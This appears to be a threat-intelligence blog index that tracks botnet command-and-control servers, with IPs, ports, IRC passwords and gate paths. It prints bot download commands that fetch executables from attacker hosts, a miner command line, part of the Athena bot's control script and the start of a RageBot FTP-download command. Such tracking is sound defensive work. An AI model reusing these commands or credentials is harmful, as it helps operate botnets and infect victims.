Resolved m.jamtes.com to 60.172.228.177 Server: m.jamtes.com Port: 7384 Server password: smart Channel: #spd Channel password: smart Channel topic #spd: !mod pdef on !mdns hxxp://146.185.246.240/avxd.gif !dl hxxp://146.185.246.190/msx6971.exe !dl hxxp://146.185.246.104/dqs.exe !s -o !j #1,#2 !dl hxxps://hotfile.com/dl/203712010/822c38b/skybe.exe Channel topic #1: !dl hxxp://146.185.246.116/mailsw7.exe !dl hxxp://146.185.246.116/lmqw7.exe !dl hxxp://146.185.246.116/five192w7.exe !dl hxxp://146.185.246.116/five172w7.exe Channel topic #2: !dl hxxp://146.185.246.116/tefw7.exe !dl hxxp://146.185.246.116/p98w7.exe !dl hxxp://146.185.246.116/p18w7.exeRead more...
beta.uandmearevideos1.com (Betabot http botnet hosted by cheaphosts.ru)
Resolved beta.uandmearevideos1.com to 146.185.246.147 Server: beta.uandmearevideos1.com Gate file: /direct/mail/order.php Alternate domains: beta.uandmearevideos2.com beta.stop2teaseme.com beta.pixartzone.com beta.dietmydart.com beta.worldwipeme.com beta.thegamejuststarted11.com beta.thegamejuststarted13.com beta.thegamejuststarted14.com beta.thegamejuststarted15.com beta.thegamejuststarted12.com beta.thegamejuststarted10.com beta.mypaintdress.com Hosting infos: http://whois.domaintools.com/146.185.246.147
proxylegitconnect.com (Reverse proxy malware hosted by ecatel.net)
Resolved dq.proxylegitconnect.com to 89.248.172.174 Resolved bren.proxylegitconnect.com to 89.248.172.145 Servers: dq.proxylegitconnect.com, bren.proxylegitconnect.com Port: 8800 Based on the port and subdomains, this is the same guy as this previous post. Hosting infos: http://whois.domaintools.com/89.248.172.174 Hosting infos: http://whois.domaintools.com/89.248.172.175
lxm.m94vo3.com(BitCoin Miner hosted in France Paris Gandi Sas)
Thanks to Aliss for the sample Resolved : [lxm.m94vo3.com] To [92.243.23.55]Resolved : [lxm.m94vo3.com] To [92.243.4.137] minerd.exe -a scrypt -u fukkerrrr.1 -p x -s 15 –no-longpoll -q -o lxm.m94vo3.com:8080 sample here hosting infos: http://whois.domaintools.com/92.243.23.55
Athena mIRC Script
Used by Athena customers for controling the bot via IRC ;Athena mIRC Script menu channel { - Athena .- .Misc ..Version:/msg $active !version ..Info:/msg $active !info ..Shell:{ %AthenaVar = $$?="Command:" msg $active !shell %AthenaVar } ..- ..Block Host:{ %AthenaVar = $$?="Host:" msg $active !http.block %AthenaVar } ..Redirect Host:{ %AthenaVar1 = $$?="Original Host:" %AthenaVar2 = $$?="RedirectRead more...
mr7x0728.biz (Betabot http botnet hosted by alibabahost.com)
Resolved mr7x0728.biz to 37.221.165.118 Server: mr7x0728.biz Gate file: /beta/order.php For all the info about the owners vps you would ever need, just check this page: hxxp://mr7x0728.biz/p.php (it looks like he’s splurged on the Standard vps package) Hosting infos: http://whois.domaintools.com/37.221.165.118
florasister.com (Ice-9 banking malware hosted by neoweb.ru)
Resolved florasister.com to 81.176.232.201 Server: florasister.com Gate file: gigling.php (backup hxxp://forandroid.tk/yandex.php (suspended)) Sites checked for configs (no droppers appear to be live): hxxp://www.jcurve.com/templates/beez/params.php hxxp://www.ivemon.es/templates/beez/params.php hxxp://www.justicecameroun.com/templates/beez/params.php hxxp://www.jackwalshcarpets.com/Joomla/templates/beez/params.php hxxp://www.kocaelidho.org.tr/templates/beez/params.php hxxp://www.moraditrade.com/en/templates/beez/params.php hxxp://www.mm-nn.com/main/templates/beez/params.php hxxp://www.jakmurowane.pl/templates/beez/params.php Also attempted to connect to bigdealworked.com on port 9702 Hosting infos: http://whois.domaintools.com/81.176.232.201
euclid.es(BetaBot hosted in Ukraine Kharkiv Infium Ltd)
This is from the anonymous guy here Resolved : [euclid.es] To [188.190.98.30] Panel: hxxp://euclid.es/147/order.php Download URLs hxxp://euclid.es/mnr1.exe hosting infos: http://whois.domaintools.com/188.190.98.30
a55555a.dontexist.com(Andromeda Bot hosted in France Roubaix Ovh Systems)
This is from the anonymous guy here Resolved : [a55555a.dontexist.com] To [188.165.87.109] Panel: a55555a.dontexist.com/XMhXautVnLzlIC/image.php hosting infos: http://whois.domaintools.com/188.165.87.109
rageevo.sytes.net(RageBot hosted in Chile Santiago Gtd Internet S.a.)
Resolved : [rageevo.sytes.net] To [190.196.122.227] PASS pass NICK raGe|PkfUmcvBta USER ofmfn “fo8.net” “rage” :ofmfn JOIN #Ev0-h4cK# ev0h4ck Now talking in #Ev0-h4cK# Topic On: [ #Ev0-h4cK# ] [ !xpl 100 1 190 -b 2 0 ] Topic By: [DJ-L0rD|Ev0| ] Modes On: [#Ev0-h4cK# ] [ +smntrul 500 ] samples here:cmd /c echo open windowsupd.serveftp.com 21 >>Read more...